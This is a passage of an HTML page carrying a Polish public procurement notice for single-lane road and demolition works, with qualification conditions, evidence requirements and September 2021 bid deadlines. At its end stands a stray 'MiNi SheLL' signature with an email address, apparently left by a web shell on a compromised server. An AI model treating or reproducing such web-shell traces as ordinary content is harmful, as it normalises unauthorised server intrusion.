zezwolenia na wycinkę drzew). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233225-2 - Roboty budowlane w zakresie dróg jednopasmowych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w<br/>art. 112 ust. 2 ustawy Pzp w szczególności dotycząc:<br/>1) zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>4) zdolności technicznej lub zawodowej<br/>a) Doświadczenie: Warunek ten zostanie spełniony, jeżeli wykonawca wykaże, iż w okresie<br/>ostatnich pięciu lat przed upływem terminu skradania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy — w tym okresie, wykonał:<br/>jedną robotę budowlaną polegającą na budowie lub przebudowie lub modernizacji chodnika lub<br/>innego obiektu (np. ścieżki pieszo - jezdnej, parkingu) o nawierzchni z kostki betonowej lub<br/>granitowej o całkowitej wartości zadania min. 100.000,00 zł brutto.<br/>b) Potencjał Kadrowy. Wykonawca musi udowodnić, iż dysponuje lub w celu wykonania<br/>przedmiotu zamówienia będzie dysponował następującymi osobami:<br/>- jedną osobą wyznaczoną do pełnienia funkcji Kierownika budowy. Wykazana osoba musi<br/>posiadać wykształcenie wyższe lub średnie oraz uprawnienia budowlane do kierowania<br/>robotami budowlanymi w specjalności drogowej wydane na podstawie obowiązujących<br/>przepisów ustawy z dnia 7 lipca 1994r. Prawo budowlane (Dz. U. z 2010r. nr 243 poz. 1623 z<br/>późn. zm.) lub odpowiadające im uprawnienia otrzymane według wcześniej obowiązujących<br/>przepisów Prawa budowlanego.<br/>- jedną osobą do pełnienia funkcji kierownika robót sanitarnych. Wskazana musi posiadać<br/>uprawnienia budowlane<br/>do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i<br/>urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych.<br/>Zamawiający określając wymogi dla potencjału kadrowego w zakresie posiadanych uprawnień<br/>budowlanych, dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na<br/>podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane<br/>obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z<br/>zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo Budowlane (t.j. Dz.U. z 2020 r.<br/>poz. 1333 ze zmianami) oraz ustawy z dnia 19 listopada 2020r. o zmianie ustawy o zasadach<br/>uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej<br/>(Dz.U. z 2021 r., poz. 78). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a) oświadczenie o aktualności informacji zawartych w oświadczeniu wstępnym, o którym jest mowa w<br/>art. 125 ust. 1 ustawy Pzp złożonym wraz z ofertą w zakresie podstaw wykluczenia - wg Załącznika nr<br/>8 do SWZ.<br/>b) oświadczenie w zakresie określonym w art. 108 ust. 1 pkt. 5 ustawy o braku przynależności do tej<br/>samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007r. o ochronie konkurencji i<br/>konsumentów (Dz. U. z 2021 r. poz. 275) z innym Wykonawcą, który złożył odrębną ofertę albo<br/>oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami<br/>potwierdzającymi, że przygotowanie oferty nastąpiło niezależnie od innego Wykonawcy należącego do<br/>tej samej grupy kapitałowej – wg Załącznika nr 9 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie<br/>ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem<br/>ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały<br/>wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane<br/>należycie - wg Załącznika nr 6 do SWZ;<br/>Dowodami, o których mowa powyżej, zgodnie z Rozporządzeniem Ministra Rozwoju, Pracy i<br/>Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych<br/>dokumentów lub oświadczeń, jakich może żądać Zamawiający od Wykonawcy (Dz. U. poz. 2415), są:<br/>referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były<br/>wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w<br/>stanie uzyskać tych dokumentów – inne dokumenty.<br/>Jeżeli wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonywanych<br/>wspólnie z innymi wykonawcami, wykaz robót budowlanych winien dotyczyć tylko robót w których<br/>wykonaniu wykonawca ten bezpośrednio uczestniczył lub uczestniczy.<br/>b) wykaz osób wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i<br/>wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie<br/>czynności oraz informacją o podstawie do dysponowania tymi osobami – wg Załącznika nr 7 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Ofertę należy złożyć na „Formularzu ofertowym” stanowiącym załącznik nr 1 do SWZ<br/>2. Wraz z Formularzem Ofertowym Wykonawca przedkłada następujące dokumenty:<br/>1) oświadczenie na podstawie art. 125 ust. 1 ustawy z dnia 11 września 2019 r. Pzp (dot.<br/>spełniania warunków udziału w postępowaniu i niepodlegania wykluczeniu) - załącznik nr 5 do<br/>SWZ<br/>2) odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej lub innego właściwego rejestru. (Stosuje się odpowiednio do<br/>podmiotu udostępniającego zasoby na zasadach określonych w art. 118 ustawy Pzp.)<br/>3) pełnomocnictwo – jeśli dotyczy,<br/>4) pisemne zobowiązanie podmiotu udostępniającego zasoby do oddania Wykonawcy do<br/>dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia lub inny podmiotowy środek<br/>dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował<br/>niezbędnymi zasobami tych podmiotów wraz z oświadczeniem podmiotu udostępniającego<br/>zasoby składanym na podstawie art. 125 ust. 1 ustawy z dnia 11 września 2019 r. ustawy Pzp –<br/>jeśli dotyczy – wzór zobowiązania wraz z oświadczeniami stanowi załącznik nr 10 (część A i B)<br/>do SWZ,<br/>5) oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia – jeśli<br/>dotyczy - Załącznik nr 11 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich<br/>Wykonawców występujących wspólnie.<br/>2) W odniesieniu do wymagań postawionych przez Zamawiającego, każdy z Wykonawców<br/>wspólnie składających ofertę dołącza oddzielnie oświadczenie o niepodleganiu wykluczeniu oraz<br/>oświadczenie o spełnianiu warunków udziału w postępowaniu zgodne ze wzorem stanowiącym<br/>Załącznik nr 5 do SWZ. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie<br/>warunków udziału w postępowaniu.<br/>3) W odniesieniu do warunków udziału w postępowaniu, Wykonawcy wspólnie ubiegający się o<br/>udzielenia zamówienia, mogą polegać na zdolnościach tych Wykonawców, którzy będą<br/>odpowiedzialni za wykonanie danego zakresu zamówienia.<br/>4) W przypadku, o którym mowa w ust. 3, wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane,<br/>wykonają poszczególni wykonawcy – wg. Wzoru stanowiącego załącznik nr 11 do SWZ.<br/>5) Wykonawcy występujący wspólnie winni ustanowić pełnomocnika (lidera) do reprezentowania<br/>ich w postępowaniu<br/>o udzielenie niniejszego zamówienia lub reprezentowania ich w postępowaniu i zawarciu umowy<br/>o udzielenie przedmiotowego zamówienia publicznego. Umocowanie może wynikać z<br/>dołączonej do oferty umowy współpracy lub odrębnego dokumentu (oświadczenia lub<br/>pełnomocnictwa).Wszelka korespondencja prowadzona będzie wyłącznie z pełnomocnikiem<br/>(liderem).<br/>6) Wspólnicy spółki cywilnej są traktowani jak Wykonawcy składający ofertę wspólną i mają do<br/>nich zastosowanie zasady określone w niniejszym rozdziale. Spółka cywilna ubiegająca się o<br/>zamówienie musi wyznaczyć pełnomocnika do jej reprezentowania. Ustawowe zasady<br/>reprezentacji spółki cywilnej zezwalające każdemu wspólnikowi na jej reprezentowanie w takich<br/>granicach, w jakich jest uprawniony do prowadzenia jej spraw, nie spełniają bowiem wymogu z<br/>art. 58 ust. 2 ustawy Pzp<br/>W przypadku spółki cywilnej art. 58 ust. 2 ustawy Pzp nie będzie miał zastosowania, jeżeli oferta<br/>zostanie podpisana kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub<br/>podpisem osobistym przez wszystkich wspólników spółki cywilnej. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projektowane postanowienia umowy w sprawie zamówienia publicznego związane z realizacją<br/>niniejszego zamówienia publicznego zawiera wzór umowy Załącznik nr 2 do SWZ.<br/>Dopuszczalne zmiany umowy określone w art. 455 ust. 1 ustawy Pzp zawiera wzór umowy<br/>stanowiący Załącznik nr 2 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-24 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://olsztynek.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-24 10:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-10-23</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com